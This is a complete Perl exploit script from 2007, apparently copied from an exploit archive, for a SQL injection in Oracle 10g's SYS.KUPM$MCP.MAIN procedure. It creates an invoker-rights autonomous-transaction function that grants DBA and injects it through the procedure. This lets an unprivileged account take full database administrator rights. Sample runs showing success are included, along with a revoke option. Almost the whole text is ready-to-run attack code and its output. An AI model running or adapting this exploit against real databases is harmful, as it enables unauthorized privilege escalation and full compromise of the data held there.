Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

#!/usr/bin/perl # #&nbsp;Remote&nbsp;Oracle&nbsp;KUPM$MCP.MAIN&nbsp;exploit&nbsp;(10g) # #&nbsp;Grant&nbsp;or&nbsp;revoke&nbsp;dba&nbsp;permission&nbsp;to&nbsp;unprivileged&nbsp;user #&nbsp; #&nbsp;Tested&nbsp;on&nbsp;\"Oracle&nbsp;Database&nbsp;10g&nbsp;Enterprise&nbsp;Edition&nbsp;Release&nbsp;10.1.0.3.0\" #&nbsp; #&nbsp;&nbsp;&nbsp;REF:&nbsp;&nbsp;&nbsp;&nbsp;http://www.red-database-security.com/ #&nbsp;&nbsp;&nbsp; #&nbsp;&nbsp;&nbsp;AUTHOR:&nbsp;Andrea&nbsp;\"bunker\"&nbsp;Purificato #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://rawlab.mindcreations.com # #&nbsp;&nbsp;&nbsp;DATE:&nbsp;&nbsp;&nbsp;Copyright&nbsp;2007&nbsp;-&nbsp;Tue&nbsp;Mar&nbsp;27&nbsp;10:47:14&nbsp;CEST&nbsp;2007 # #&nbsp;Oracle&nbsp;InstantClient&nbsp;(basic&nbsp;+&nbsp;sdk)&nbsp;required&nbsp;for&nbsp;DBD::Oracle #&nbsp; #&nbsp;bunker@fin:~$&nbsp;perl&nbsp;kupm-mcpmain.pl&nbsp;-h&nbsp;localhost&nbsp;-s&nbsp;test&nbsp;-u&nbsp;bunker&nbsp;-p&nbsp;****&nbsp;-r #&nbsp;&nbsp;[-]&nbsp;Wait... #&nbsp;&nbsp;[-]&nbsp;Revoking&nbsp;DBA&nbsp;from&nbsp;BUNKER... #&nbsp;&nbsp;DBD::Oracle::db&nbsp;do&nbsp;failed:&nbsp;ORA-01951:&nbsp;ROLE&nbsp;\'DBA\'&nbsp;not&nbsp;granted&nbsp;to&nbsp;\'BUNKER\'&nbsp;(DBD&nbsp;ERROR:&nbsp;OCIStmtExecute)&nbsp;[for&nbsp;Statement&nbsp;\"REVOKE&nbsp;DBA&nbsp;FROM&nbsp;BUNKER\"]&nbsp;at&nbsp;kupm-mcpmain.pl&nbsp;line&nbsp;97. #&nbsp;&nbsp;[-]&nbsp;Done! #&nbsp; #&nbsp;bunker@fin:~$&nbsp;perl&nbsp;kupm-mcpmain.pl&nbsp;-h&nbsp;localhost&nbsp;-s&nbsp;test&nbsp;-u&nbsp;bunker&nbsp;-p&nbsp;****&nbsp;-g #&nbsp;&nbsp;[-]&nbsp;Wait... #&nbsp;&nbsp;[-]&nbsp;Creating&nbsp;evil&nbsp;function... #&nbsp;&nbsp;[-]&nbsp;Go&nbsp;...(don\'t&nbsp;worry&nbsp;about&nbsp;errors)! #&nbsp;&nbsp;DBD::Oracle::st&nbsp;execute&nbsp;failed:&nbsp;ORA-06512:&nbsp;at&nbsp;\"SYS.KUPM$MCP\",&nbsp;line&nbsp;874 #&nbsp;&nbsp;ORA-06512:&nbsp;at&nbsp;line&nbsp;3&nbsp;(DBD&nbsp;ERROR:&nbsp;OCIStmtExecute)&nbsp;[for&nbsp;Statement&nbsp;\" #&nbsp;&nbsp;BEGIN #&nbsp;&nbsp;&nbsp;SYS.KUPM$MCP.MAIN(\'\'\'&nbsp;AND&nbsp;0=BUNKER.own--\',\'\'); #&nbsp;&nbsp;END;\"]&nbsp;at&nbsp;kupm-mcpmain.pl&nbsp;line&nbsp;119. #&nbsp;&nbsp;[-]&nbsp;YOU&nbsp;GOT&nbsp;THE&nbsp;POWAH!! #&nbsp; #&nbsp;bunker@fin:~$&nbsp;perl&nbsp;kupm-mcpmain.pl&nbsp;-h&nbsp;localhost&nbsp;-s&nbsp;test&nbsp;-u&nbsp;bunker&nbsp;-p&nbsp;****&nbsp;-r #&nbsp;&nbsp;[-]&nbsp;Wait... #&nbsp;&nbsp;[-]&nbsp;Revoking&nbsp;DBA&nbsp;from&nbsp;BUNKER... #&nbsp;&nbsp;[-]&nbsp;Done!&nbsp; # use&nbsp;warnings; use&nbsp;strict; use&nbsp;DBI; use&nbsp;Getopt::Std; use&nbsp;vars&nbsp;qw/&nbsp;%opt&nbsp;/; sub&nbsp;usage&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;<<\"USAGE\"; &nbsp;&nbsp;&nbsp;&nbsp; Syntax:&nbsp;$0&nbsp;-h&nbsp;<host>&nbsp;-s&nbsp;<sid>&nbsp;-u&nbsp;<user>&nbsp;-p&nbsp;<passwd>&nbsp;-g|-r&nbsp;[-P&nbsp;<port>] Options: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-h&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<host>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;server&nbsp;address &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-s&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<sid>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;sid&nbsp;name &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-u&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<user>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;user &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-p&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<passwd>&nbsp;&nbsp;&nbsp;password&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-g|-r&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(g)rant&nbsp;dba&nbsp;to&nbsp;user&nbsp;|&nbsp;(r)evoke&nbsp;dba&nbsp;from&nbsp;user &nbsp;&nbsp;&nbsp;&nbsp;[-P&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<port>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Oracle&nbsp;port] USAGE &nbsp;&nbsp;&nbsp;&nbsp;exit&nbsp;0 } my&nbsp;$opt_string&nbsp;=&nbsp;\'h:s:u:p:grP:\'; getopts($opt_string,&nbsp;\\%opt)&nbsp;or&nbsp;&usage; &usage&nbsp;if&nbsp;(&nbsp;!$opt{h}&nbsp;or&nbsp;!$opt{s}&nbsp;or&nbsp;!$opt{u}&nbsp;or&nbsp;!$opt{p}&nbsp;); &usage&nbsp;if&nbsp;(&nbsp;!$opt{g}&nbsp;and&nbsp;!$opt{r}&nbsp;); my&nbsp;$user&nbsp;=&nbsp;uc&nbsp;$opt{u}; my&nbsp;$dbh&nbsp;=&nbsp;undef; if&nbsp;($opt{P})&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$dbh&nbsp;=&nbsp;DBI->connect(\"dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}\",&nbsp;$opt{u},&nbsp;$opt{p})&nbsp;or&nbsp;die; }&nbsp;else&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;$dbh&nbsp;=&nbsp;DBI->connect(\"dbi:Oracle:host=$opt{h};sid=$opt{s}\",&nbsp;$opt{u},&nbsp;$opt{p})&nbsp;or&nbsp;die; } my&nbsp;$sqlcmd&nbsp;=&nbsp;\"GRANT&nbsp;ALL&nbsp;PRIVILEGE,&nbsp;DBA&nbsp;TO&nbsp;$user\"; print&nbsp;\"[-]&nbsp;Wait... \"; if&nbsp;($opt{r})&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;\"[-]&nbsp;Revoking&nbsp;DBA&nbsp;from&nbsp;$user... \"; &nbsp;&nbsp;&nbsp;&nbsp;$sqlcmd&nbsp;=&nbsp;\"REVOKE&nbsp;DBA&nbsp;FROM&nbsp;$user\"; &nbsp;&nbsp;&nbsp;&nbsp;$dbh->do(&nbsp;$sqlcmd&nbsp;); &nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;\"[-]&nbsp;Done! \"; &nbsp;&nbsp;&nbsp;&nbsp;$dbh->disconnect; &nbsp;&nbsp;&nbsp;&nbsp;exit; } print&nbsp;\"[-]&nbsp;Creating&nbsp;evil&nbsp;function... \"; $dbh->do(&nbsp;qq{ CREATE&nbsp;OR&nbsp;REPLACE&nbsp;FUNCTION&nbsp;OWN&nbsp;RETURN&nbsp;NUMBER&nbsp; &nbsp;AUTHID&nbsp;CURRENT_USER&nbsp;AS&nbsp; &nbsp;PRAGMA&nbsp;AUTONOMOUS_TRANSACTION;&nbsp; BEGIN &nbsp;EXECUTE&nbsp;IMMEDIATE&nbsp;\'$sqlcmd\';&nbsp;COMMIT;&nbsp; &nbsp;RETURN(0); END; }&nbsp;); &nbsp; print&nbsp;\"[-]&nbsp;Go&nbsp;...(don\'t&nbsp;worry&nbsp;about&nbsp;errors)! \"; my&nbsp;$sth&nbsp;=&nbsp;$dbh->prepare(&nbsp;qq{ BEGIN &nbsp;SYS.KUPM$MCP.MAIN(\'\'\'&nbsp;AND&nbsp;0=$user.own--\',\'\'); END;}); $sth->execute; $sth->finish; print&nbsp;\"[-]&nbsp;YOU&nbsp;GOT&nbsp;THE&nbsp;POWAH!! \"; $dbh->disconnect; exit; &nbsp;